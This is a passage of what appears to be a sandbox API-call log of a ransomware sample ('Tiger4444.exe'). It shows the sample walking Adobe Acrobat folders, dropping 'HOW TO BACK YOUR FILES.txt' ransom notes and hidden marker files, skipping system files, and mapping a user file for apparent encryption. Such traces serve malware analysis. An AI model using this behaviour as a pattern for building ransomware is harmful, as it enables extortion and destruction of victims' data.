ListHead=0xc66828, ListEntry=0xc666c8 | out: ListHead=0xc66828, ListEntry=0xc666c8) returned 0xc66548 [0059.348] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x5bd69dbd, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5bd69dbd, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DC", cAlternateFileName="")) returned 0 [0059.348] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0059.349] lstrcpyW (in: lpString1=0x30aeb04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.349] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.349] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.350] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.350] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.350] CloseHandle (hObject=0x2b8) returned 1 [0059.350] CloseHandle (hObject=0x2c4) returned 1 [0059.350] GetCurrentThreadId () returned 0xfa8 [0059.350] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666c8 [0059.350] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC" [0059.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8f8c0 | out: hHeap=0xc50000) returned 1 [0059.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666c0 | out: hHeap=0xc50000) returned 1 [0059.350] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC" [0059.350] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\" [0059.350] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3" [0059.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.351] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.354] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.355] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.355] CloseHandle (hObject=0x2c4) returned 1 [0059.356] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned 48 [0059.356] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.356] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x5bd69dbd, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x8865d413, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0059.356] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.356] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.356] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.356] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.356] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x5bd69dbd, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x8865d413, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.356] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.356] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.356] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.356] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.356] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.356] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8865d413, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8865d413, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8865d413, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.356] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.356] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.356] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517e05da, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x517e05da, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x517e05da, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Collab", cAlternateFileName="")) returned 1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="Tiger4444.exe") returned -1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2=".") returned 1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="..") returned 1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="windows") returned -1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="bootmgr") returned 1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="pagefile.sys") returned -1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="boot") returned 1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="ids.txt") returned -1 [0059.357] lstrcmpiW (lpString1="Collab", lpString2="NTUSER.DAT") returned -1 [0059.357] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="Collab" | out: lpString1="Collab") returned="Collab" [0059.357] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0059.357] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x70) returned 0xc89b30 [0059.357] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc66548 [0059.357] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5163cbb3, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5163cbb3, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5163cbb3, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Forms", cAlternateFileName="")) returned 1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="Tiger4444.exe") returned -1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2=".") returned 1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="..") returned 1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="windows") returned -1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="bootmgr") returned 1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="pagefile.sys") returned -1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="boot") returned 1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="ids.txt") returned -1 [0059.357] lstrcmpiW (lpString1="Forms", lpString2="NTUSER.DAT") returned -1 [0059.357] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="Forms" | out: lpString1="Forms") returned="Forms" [0059.357] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666a0 [0059.358] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6e) returned 0xc89d10 [0059.358] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666a8 | out: ListHead=0xc66828, ListEntry=0xc666a8) returned 0xc66308 [0059.358] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b406794, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xd82b1d84, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd82b1d84, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JSCache", cAlternateFileName="")) returned 1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="Tiger4444.exe") returned -1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2=".") returned 1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="..") returned 1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="windows") returned -1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="bootmgr") returned 1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="pagefile.sys") returned -1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="boot") returned 1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="ids.txt") returned 1 [0059.358] lstrcmpiW (lpString1="JSCache", lpString2="NTUSER.DAT") returned -1 [0059.358] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="JSCache" | out: lpString1="JSCache") returned="JSCache" [0059.358] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664c0 [0059.358] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x72) returned 0xc83790 [0059.358] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664c8 | out: ListHead=0xc66828, ListEntry=0xc664c8) returned 0xc666a8 [0059.358] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5c7194c4, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="Tiger4444.exe") returned -1 [0059.358] lstrcmpiW (lpString1="Security", lpString2=".") returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="..") returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="windows") returned -1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="bootmgr") returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="pagefile.sys") returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="boot") returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="ids.txt") returned 1 [0059.358] lstrcmpiW (lpString1="Security", lpString2="NTUSER.DAT") returned 1 [0059.358] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="Security" | out: lpString1="Security") returned="Security" [0059.359] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0059.359] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x74) returned 0xc83390 [0059.359] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc664c8 [0059.359] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5c7194c4, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0059.359] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0059.359] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.361] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.361] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.362] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.362] CloseHandle (hObject=0x2b8) returned 1 [0059.362] CloseHandle (hObject=0x2c4) returned 1 [0059.362] GetCurrentThreadId () returned 0xfa8 [0059.362] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0059.362] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" [0059.362] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83390 | out: hHeap=0xc50000) returned 1 [0059.362] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0059.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" [0059.362] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\" [0059.362] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\.BFC0E91B00AE8A0620D3" [0059.362] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.366] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.368] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.369] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.370] CloseHandle (hObject=0x2c4) returned 1 [0059.370] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned 57 [0059.370] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.370] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x8865d413, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0059.370] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.370] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.370] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.371] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.371] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x8865d413, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.371] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.371] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.371] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.371] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.371] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.371] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8865d413, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8865d413, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x88685ad2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.371] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.371] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.371] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c7194c4, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5c7194c4, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5c78bbf1, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x1ebe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="addressbook.acrodata", cAlternateFileName="ADDRES~1.ACR")) returned 1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Tiger4444.exe") returned -1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2=".") returned 1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="..") returned 1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="windows") returned -1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="bootmgr") returned -1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="pagefile.sys") returned -1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="boot") returned -1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ids.txt") returned -1 [0059.371] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="NTUSER.DAT") returned -1 [0059.371] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="addressbook.acrodata" | out: lpString1="addressbook.acrodata") returned="addressbook.acrodata" [0059.371] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata", dwFileAttributes=0x0) returned 1 [0059.372] lstrlenW (lpString="addressbook.acrodata") returned 20 [0059.372] lstrlenW (lpString="Tiger4444") returned 9 [0059.372] lstrcmpiW (lpString1=".acrodata", lpString2="Tiger4444") returned -1 [0059.372] lstrlenW (lpString=".dll") returned 4 [0059.372] lstrcmpiW (lpString1="data", lpString2=".dll") returned 1 [0059.372] lstrlenW (lpString=".lnk") returned 4 [0059.372] lstrcmpiW (lpString1="data", lpString2=".lnk") returned 1 [0059.372] lstrlenW (lpString=".ini") returned 4 [0059.372] lstrcmpiW (lpString1="data", lpString2=".ini") returned 1 [0059.372] lstrlenW (lpString=".sys") returned 4 [0059.372] lstrcmpiW (lpString1="data", lpString2=".sys") returned 1 [0059.372] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0059.373] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0059.373] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=15082578197) returned 1 [0059.373] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=7870) returned 1 [0059.373] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0059.373] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0059.373] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x21c0, lpName=0x0) returned 0x2cc [0059.374] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21c0) returned 0xbe0000 [0059.384] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0059.384] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0059.384] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0059.384] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0059.384] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0059.385] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: 